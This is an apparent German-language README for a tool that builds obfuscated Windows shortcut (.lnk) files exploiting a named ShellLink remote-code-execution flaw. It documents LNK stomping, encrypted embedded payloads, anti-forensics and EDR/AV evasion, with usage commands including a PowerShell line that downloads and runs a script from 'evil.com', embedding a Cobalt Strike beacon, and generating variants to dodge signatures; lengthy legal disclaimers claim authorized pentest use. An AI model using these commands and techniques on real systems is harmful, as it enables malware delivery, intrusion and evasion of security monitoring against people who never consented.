
Generiert obfuskierte .lnk-Dateien, die CVE-2026-21510 mit LNK-Stomping, verschlüsselten Payloads und Anti-Forensik für autorisierte Penetrationstests und Red-Team-Operationen ausnutzen.
README EpSiLoNPoInTlnk CVE-2026-21510 - .LNK-Generator Tool zur Erzeugung von .lnk-Dateien unter Ausnutzung der Schwachstelle CVE-2026-21510 (Windows ShellLink Remote Code Execution). Entwickelt für offensive Sicherheitsforschung, autorisierte Penetrationstests und Schwachstellenanalyse.
Rechtlicher Hinweis ⚠️ DIESES TOOL IST AUSSCHLIESSLICH FÜR LEGALE UND AUTORISIERTE ZWECKE BESTIMMT. Jede unbefugte Nutzung gegen Systeme oder Netzwerke würde gegen lokale und internationale Gesetze verstoßen (z. B. Computer Fraud and Abuse Act (CFAA), DSGVO, Loi Godfrain in Frankreich). Der Autor übernimmt keinerlei Haftung für missbräuchliche Verwendung. (Siehe Haftungsausschluss unten.)
Beschreibung Dieser Generator erstellt obfuskierte .lnk-Dateien zur Ausnutzung von CVE-2026-21510, einer Schwachstelle in der Verarbeitung von Windows-Verknüpfungen. Er integriert:
LNK Stomping (5 Varianten: dot, path_segment, relative, double_extension, unicode)
PropertyStore mit zufälligen CLSIDs und PKEYs
KnownFolderDataBlock (zufällige oder gezielte KnownFolderIDs)
EnvironmentVariableDataBlock (Unicode-Obfuskation, dynamische Variablen)
Obfuskation (Stufen 1-5: TrackerDataBlock, ConsoleDataBlock, zufällige Blöcke)
Eingebettete und verschlüsselte Payloads (AES-256-CBC + XOR)
Anti-Forensik (Timestamps auf 0, Dateigröße auf 0, minimale Metadaten)
EDR/AV-Umgehung (legitime Prozesse, obfuskierte PowerShell-Argumente)
Generierung zufälliger Varianten (10+ einzigartige Varianten zur Vermeidung von Signaturen)
Voraussetzungen System OS: Windows (zum Testen der generierten .lnk-Dateien) oder Linux/macOS (für die Generierung).
Python: ≥ 3.10. Abhängigkeiten: pip install pycryptodome
Empfohlene Tools Analyse: PEStudio, Detect It Easy (DIE)
Debugging: x64dbg, WinDbg
Tests: Isolierte Windows-VM (z. B. Windows 10/11 auf VirtualBox).
Installation Repository klonen: git clone https://github.com/EpSiLoNPoInT/EpSiLoNPoInTlnk.git cd EpSiLoNPoInTlnk Abhängigkeiten installieren: pip install -r requirements.txt (Optional) Virtuelle Umgebung erstellen: python -m venv venv source venv/bin/activate # Linux/macOS venv\Scripts\activate # Windows
Verwendung
Basis-Generierung python lnkstomperpoint.py --target "C:\Windows\System32\cmd.exe" --args "/c calc.exe" --output exploit.lnk Erzeugt eine .lnk-Datei, die CVE-2026-21510 nutzt, um calc.exe zu starten.
Erweiterte Optionen Option Beschreibung Standardwert --target Zielpfad (z. B. C:\Windows\System32\cmd.exe) C:\Windows\System32\cmd.exe --args Argumente für das Ziel (z. B. /c whoami) /c calc.exe --output Ausgabepfad der .lnk-Datei ./EpSiLoNPoInTlnk_[TIMESTAMP].lnk --working-dir Arbeitsverzeichnis C:\Windows\System32 --description Beschreibung der Verknüpfung Zufällige Zeichenfolge --unc UNC-Pfad verwenden (?\C:...) False --lnk-stomping LNK Stomping aktivieren True --stomping-variant LNK-Stomping-Variante (dot, path_segment, relative, double_extension, unicode, random) random --obfuscation Unnötige ExtraData-Blöcke hinzufügen True --obfuscation-level Obfuskationsstufe (1-5) 5 --embed-payload Pfad zu einer einzubettenden Datei (z. B. payload.bin) None --encrypt-payload Payload verschlüsseln (AES-256-CBC + XOR) True --anti-forensics Anti-Forensik-Techniken anwenden True --randomize-clsid CLSID im PropertyStore randomisieren True --randomize-known-folder KnownFolderID randomisieren True --obfuscate-arguments Argumente obfuskieren (PowerShell) True --generate-variants N zufällige Varianten generieren 0 --debug Erweiterter Debug-Modus (detaillierte Logs) False
Beispiele
Beispiel 1: Exploit mit eingebettetem Payload
python lnkstomperpoint.py
--target "C:\Windows\System32\cmd.exe"
--args "/c payload.exe"
--embed-payload ./malware.bin
--output exploit_with_payload.lnk
--obfuscation-level 5
--anti-forensics
Erzeugt eine .lnk-Datei mit verschlüsseltem (AES-256 + XOR) und obfuskiertem Payload.
Beispiel 2: Generierung von 10 zufälligen Varianten
python lnkstomperpoint.py
--target "C:\Windows\System32\powershell.exe"
--args "-nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/shellcode.ps1')"
--generate-variants 10
--output-dir ./variants
Erstellt 10 einzigartige Varianten zur Vermeidung von EDR/AV-Signaturen.
Beispiel 3: Minimalistischer Modus (für Tests)
python lnkstomperpoint.py
--target "C:\Windows\System32\notepad.exe"
--obfuscation False
--anti-forensics False
--output minimal_exploit.lnk
Erzeugt eine nicht obfuskierte .lnk-Datei (für Analyse oder Debugging).
Technische Funktionsweise
ShellLink-Header (0x4C feste Bytes + Offsets): LinkCLSID: 00021401-0000-0000-C000-000000000046 (obligatorisch). LinkFlags: Konfiguriert zur Aktivierung von HasRelativePath, HasWorkingDir, IsUnicode usw.
StringData: RelativePath: Zielpfad (mit LNK Stomping, falls aktiviert). WorkingDir: Arbeitsverzeichnis (z. B. C:\Windows\System32). Arguments: Obfuskierte Argumente (PowerShell, cmd usw.).
ExtraData-Blöcke (kritische Reihenfolge): PropertyStoreDataBlock: Enthält PKEY_AppUserModel_ID (zufällige CLSID). KnownFolderDataBlock: Verweist auf einen Systemordner (z. B. %SystemRoot%). EnvironmentVariableDataBlock: Erzwingt die Variablenerweiterung vor dem Mark-of-the-Web (MotW). Obfuskationsblöcke (je nach obfuscation_level): TrackerDataBlock (Stufe 1) ConsoleDataBlock (Stufe 2) DarwinDataBlock, ShimDataBlock usw. (Stufen 3-5)
Eingebetteter Payload (falls --embed-payload): Verschlüsselt mit AES-256-CBC + XOR.
Der Payload wird mit AES-256-CBC verschlüsselt (zufälliger 32-Byte-Schlüssel, 16-Byte-IV).
Eine XOR-Schicht wird mit den ersten 16 Bytes des AES-Schlüssels angewendet.
Schlüssel und IV werden in einem ShimDataBlock für die spätere Entschlüsselung gespeichert.
Tests und Validierung
Die Mindestgröße der Datei.
Die Gültigkeit von HeaderSize und CLSID.
Das Vorhandensein der erforderlichen LinkFlags.
Die Struktur der ExtraData-Blöcke (PropertyStore, KnownFolder usw.).
Ausführung (in isolierter Umgebung): Doppelklick auf die .lnk-Datei und Beobachten des Verhaltens. Process Monitor (ProcMon) zur Analyse der Systemaufrufe verwenden.
EDR/AV-Erkennung: Mit Tools wie Windows Defender oder CrowdStrike testen. Wird die .lnk-Datei erkannt, das obfuscation_level erhöhen oder bestimmte Optionen deaktivieren.
Anwendungsfälle Szenario Befehl Beschreibung Penetrationstest --target "C:\Windows\System32\cmd.exe" --args "/c whoami" Prüft, ob der Exploit auf einer Zielmaschine funktioniert. Red Team --embed-payload ./cobaltstrike_beacon.bin --obfuscation-level 5 Erzeugt eine .lnk-Datei mit obfuskiertem Cobalt-Strike-Payload. Forschung --generate-variants 50 --output-dir ./samples Erstellt 50 Varianten zum Testen von EDR-Erkennungen. Debugging --debug --obfuscation False Zeigt detaillierte Logs zur Analyse der .lnk-Struktur. Beiträge Beiträge sind willkommen! So kannst du beitragen:
Forke das Projekt.
Erstelle einen Branch (git checkout -b feature/meine-neue-funktion).
Commite deine Änderungen (git commit -m "Hinzufügen der Funktion X").
Pushe den Branch (git push origin feature/meine-neue-funktion).
Öffne eine Pull Request. Beitragsideen:
Neue LNK-Stomping-Varianten hinzufügen.
Weitere Verschlüsselungsalgorithmen implementieren (z. B. ChaCha20).
Die Argument-Obfuskation verbessern (z. B. Verwendung von JScript).
Unit-Tests zur Validierung der .lnk-Strukturen hinzufügen.
Lizenz Dieses Projekt ist unter der MIT-Lizenz lizenziert. Siehe die Datei LICENSE für weitere Details.
Haftungsausschluss 🚨 Haftungsausschluss
📜 HAFTUNGSAUSSCHLUSS (DISCLAIMER)
Bitte vor der Verwendung dieses Tools sorgfältig lesen.
⚠️ AUSDRÜCKLICHER RECHTLICHER HINWEIS
Der Benutzer dieses Tools (im Folgenden "der Benutzer") erkennt an und akzeptiert ausdrücklich die folgenden Bedingungen:
Nur legale Nutzung
Dieses Tool ist ausschließlich für legale und autorisierte Zwecke bestimmt, wie zum Beispiel:
Sicherheitsforschung im akademischen oder beruflichen Rahmen.
Penetrationstests (Pentest) an Systemen, für die der Benutzer die schriftliche Genehmigung des Eigentümers besitzt.
Schwachstellenanalyse in kontrollierten Umgebungen (z. B. Sicherheitslabore, CTF, autorisierte Bug-Bounty-Programme).
Jede andere Nutzung ist strengstens untersagt und kann in vielen Rechtsordnungen eine Straftat darstellen, einschließlich (aber nicht beschränkt auf):
Frankreich: Gesetz Nr. 88-19 vom 5. Januar 1988 (Loi Godfrain), Artikel 323-1 bis 323-7 des Strafgesetzbuchs (unbefugter Zugriff, Datenänderung usw.).
Europäische Union: Richtlinie 2013/40/EU über Angriffe auf Informationssysteme.
USA: Computer Fraud and Abuse Act (CFAA), 18 U.S. Code § 1030.
Andere Länder: Entsprechende lokale Gesetze (z. B. Computer Misuse Act im Vereinigten Königreich).
Keine Garantie
Der Autor (EpSiLoNPoInT) übernimmt keinerlei ausdrückliche oder stillschweigende Garantie hinsichtlich:
Der Zuverlässigkeit, Richtigkeit oder Nützlichkeit dieses Tools.
Des Fehlens von Fehlern oder Schwachstellen im Code.
Der Kompatibilität mit allen Systemen oder Umgebungen.
Der bei der Nutzung des Tools erzielten Ergebnisse.
Der Benutzer trägt alle mit der Nutzung dieses Tools verbundenen Risiken, einschließlich (aber nicht beschränkt auf):
Materielle oder softwarebezogene Schäden an seinem eigenen System oder an Systemen Dritter.
Rechtliche Konsequenzen bei Verstößen gegen geltendes Recht.
Datenverluste oder Dienstunterbrechungen.
Haftungsbeschränkung
In keinem Fall haften der Autor, die Mitwirkenden oder andere an der Erstellung, Produktion oder Verbreitung dieses Tools beteiligte Parteien für:
Schäden jeglicher Art (direkte, indirekte, beiläufige, besondere, exemplarische oder Folgeschäden), einschließlich (aber nicht beschränkt auf):
Gewinnverluste.
Datenverluste oder Dateibeschädigung.
Rufschädigung.
Gerichtliche Verfahren oder Geldstrafen, die der Benutzer erleidet.
Selbst wenn der Autor über die Möglichkeit solcher Schäden informiert wurde.
Einhaltung von Gesetzen und Vorschriften
Der Benutzer verpflichtet sich, alle in seiner Rechtsordnung geltenden Gesetze, Vorschriften und Normen einzuhalten, einschließlich (aber nicht beschränkt auf):
Datenschutzgesetze (z. B. DSGVO in der EU).
Gesetze zur Cybersicherheit und Computerbetrug.
Sicherheitsrichtlinien seines Arbeitgebers oder seiner Organisation.
Der Benutzer stellt den Autor von allen Ansprüchen, Schäden oder Kosten (einschließlich Anwaltskosten) frei, die sich aus einem Verstoß gegen diese Gesetze oder Verpflichtungen ergeben.
Verbot der böswilligen Weiterverbreitung
Dem Benutzer ist es ausdrücklich untersagt:
Dieses Tool zu verkaufen, zu vermieten oder zu böswilligen Zwecken weiterzuverbreiten.
Den Code zu modifizieren, um daraus eine Cyberwaffe zu machen (z. B. Ransomware, Spyware).
Dieses Tool zum Angriff auf kritische Infrastrukturen (z. B. Krankenhäuser, Regierungen, Banken) ohne ausdrückliche Genehmigung zu verwenden.
Dieses Tool an Dritte weiterzugeben, ohne ihnen diesen Haftungsausschluss mitzuteilen.
Haftungsausschluss für Dritte
Dieses Tool kann mit Bibliotheken Dritter interagieren (z. B. pycryptodome).
Der Autor kontrolliert diese Bibliotheken nicht und ist nicht für deren Handlungen oder Schwachstellen verantwortlich.
Der Benutzer muss die Lizenz und Sicherheit aller verwendeten Abhängigkeiten überprüfen.
Nutzung auf eigenes Risiko
Durch die Nutzung dieses Tools akzeptieren Sie die Bedingungen dieser Klausel vollständig und vorbehaltlos.
Wenn Sie mit diesen Bedingungen nicht einverstanden sind, verwenden Sie dieses Tool nicht und löschen Sie umgehend alle Kopien in Ihrem Besitz.
Gerichtsstand und anwendbares Recht
Diese Klausel unterliegt den Gesetzen der Französischen Republik und ist entsprechend auszulegen.
Alle Streitigkeiten, die sich aus oder im Zusammenhang mit dieser Klausel oder der Nutzung dieses Tools ergeben, unterliegen der ausschließlichen Zuständigkeit der Gerichte von Paris (Frankreich).
🔐 Sicherheitsempfehlungen
Für eine sichere und legale Nutzung dieses Tools: ✅ Testen Sie immer in einer virtuellen Umgebung (z. B. VirtualBox, VMware). ✅ Holen Sie eine schriftliche Genehmigung ein, bevor Sie Systeme testen, die Ihnen nicht gehören. ✅ Deaktivieren Sie die Netzwerkverbindungen der Testmaschinen, um versehentliche Lecks zu vermeiden. ✅ Verwenden Sie Überwachungstools (z. B. Wireshark, Process Monitor) zur Verhaltensanalyse. ✅ Melden Sie Schwachstellen verantwortungsvoll (z. B. über Bug-Bounty-Programme). ❌ Testen Sie niemals Produktionssysteme ohne Genehmigung. ❌ Teilen Sie generierte Exploits nicht mit unbefugten Personen. ❌ Speichern Sie bösartige Payloads nicht auf öffentlich zugänglichen Systemen.
📞 Kontakt
Bei rechtlichen oder technischen Fragen zu diesem Tool:
Autor: EpSiLoNPoInT
E-Mail: [email protected]
GitHub: EpSiLoNPoInTOrI
⚠️ Hinweis: Der Autor bietet keinerlei Support für illegale oder unethische Nutzung dieses Tools.
📅 Datum der Klausel
Letzte Aktualisierung: 9. Mai 2026 Version: 1.0